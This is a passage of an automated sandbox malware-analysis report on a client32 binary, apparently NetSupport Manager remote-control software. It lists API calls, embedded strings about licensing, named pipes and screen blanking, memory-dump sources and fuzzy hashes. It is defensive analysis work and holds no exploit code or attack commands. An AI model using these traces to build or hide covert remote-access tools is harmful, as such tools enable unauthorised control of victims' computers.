                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileNameTempwsprintf
                                                                                                                                                                                                    • String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$305090$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : File checksum matches new checksum so don't write file but load$ReplaceLicFile : Load new license file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
                                                                                                                                                                                                    • API String ID: 2029944419-3224476070
                                                                                                                                                                                                    • Opcode ID: 56bb1cfb618b80d56de75f6d6c36360757d97bcfb224a5606af07d0a30c758e5
                                                                                                                                                                                                    • Instruction ID: 6903609fa05968b79cc99ebba03b166313860aa57c38e94e7175ce74c4acfd72
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56bb1cfb618b80d56de75f6d6c36360757d97bcfb224a5606af07d0a30c758e5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BC12575E0062A5BEB20DB64CC40FEEF779AF80708F5441D5E91977181EB716A84CFA2
                                                                                                                                                                                                    Function 687EEB64 Relevance: 47.0, APIs: 31, Instructions: 498fileCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _isatty.MSVCR100(?,?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002), ref: 687EEBF3
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE), ref: 687EEC24
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 687EF105
                                                                                                                                                                                                    • __doserrno.MSVCR100(00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?), ref: 6880FD8D
                                                                                                                                                                                                    • _errno.MSVCR100(00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?), ref: 6880FD94
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?), ref: 6880FD9F
                                                                                                                                                                                                    • __doserrno.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDBA
                                                                                                                                                                                                    • _errno.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDC2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDCD
                                                                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 6880FDDE
                                                                                                                                                                                                    • _getptd.MSVCR100(?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0), ref: 6880FDF8
                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002), ref: 6880FE16
                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,687EECE1,?,?,?,687EED00,00000010,688089FE,?,00000000,00000002,?,688845D0,?,?), ref: 6880FE36
                                                                                                                                                                                                    • isleadbyte.MSVCR100(00000000), ref: 6880FEA6
                                                                                                                                                                                                    • __fassign.LIBCMT(?,?,00000002), ref: 6880FED0
                                                                                                                                                                                                    • __fassign.LIBCMT(?,?,00000001), ref: 6880FEF4
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6880FF26
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6880FF4F
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6880FFA8
                                                                                                                                                                                                    • _putwch_nolock.MSVCR100(?), ref: 6881000B
                                                                                                                                                                                                    • _putwch_nolock.MSVCR100(0000000D), ref: 68810038
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1737003884-0
                                                                                                                                                                                                    • Opcode ID: 3dbc6e294da2957ce205c0b760e1f7c28b87792cff0c4b5d6112c3bcb33e08ac
                                                                                                                                                                                                    • Instruction ID: 61ec80c96ec5be4595383bfb4d95214a796f7200bfd1c12cc53ef2e85e312f93
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbc6e294da2957ce205c0b760e1f7c28b87792cff0c4b5d6112c3bcb33e08ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A129E35A05269CFCB218F28CD88BD9B7B4FF0A314F8445E9E45AD7991D7709A80CF62
                                                                                                                                                                                                    Function 11139060 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 111390C5
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 111390D9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113914F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113916B
                                                                                                                                                                                                    • CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 1113929B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
                                                                                                                                                                                                    • SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
                                                                                                                                                                                                    • String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1116282658-3566152235
                                                                                                                                                                                                    • Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55
                                                                                                                                                                                                    Function 110433B0 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 327windowtimeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                                                                                                    • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11043445
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 11043473
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11043558
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 110435A1
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 110435D5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 110436CA
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8
                                                                                                                                                                                                      • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 11043705
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 1104372A
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 11043731
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
                                                                                                                                                                                                    • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                                                                                                                                                    • API String ID: 1946598539-1930157642
                                                                                                                                                                                                    • Opcode ID: 00eebd789066c9a2b16be221310bca7b8375f5ba327e1451c21d8dfcc0be106b
                                                                                                                                                                                                    • Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00eebd789066c9a2b16be221310bca7b8375f5ba327e1451c21d8dfcc0be106b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90
                                                                                                                                                                                                    Function 1104F2F0 Relevance: 44.1, APIs: 18, Strings: 7, Instructions: 316filepipethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104F394
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1104F3C8
                                                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,24DE4E77), ref: 1104F40B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
                                                                                                                                                                                                    • GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1104F4FA
                                                                                                                                                                                                    • GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1104F5C8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 1104F5E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
                                                                                                                                                                                                    • String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
                                                                                                                                                                                                    • API String ID: 1070019554-2085025582
                                                                                                                                                                                                    • Opcode ID: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
                                                                                                                                                                                                    • Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51
                                                                                                                                                                                                    Function 1109D0D0 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 278COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1109D180
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D195
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D19B
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109D1A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                                                                                                    • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                                                                                                    • API String ID: 1194186020-3727536503
                                                                                                                                                                                                    • Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                                                                                                    • Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60
                                                                                                                                                                                                    Function 11005390 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
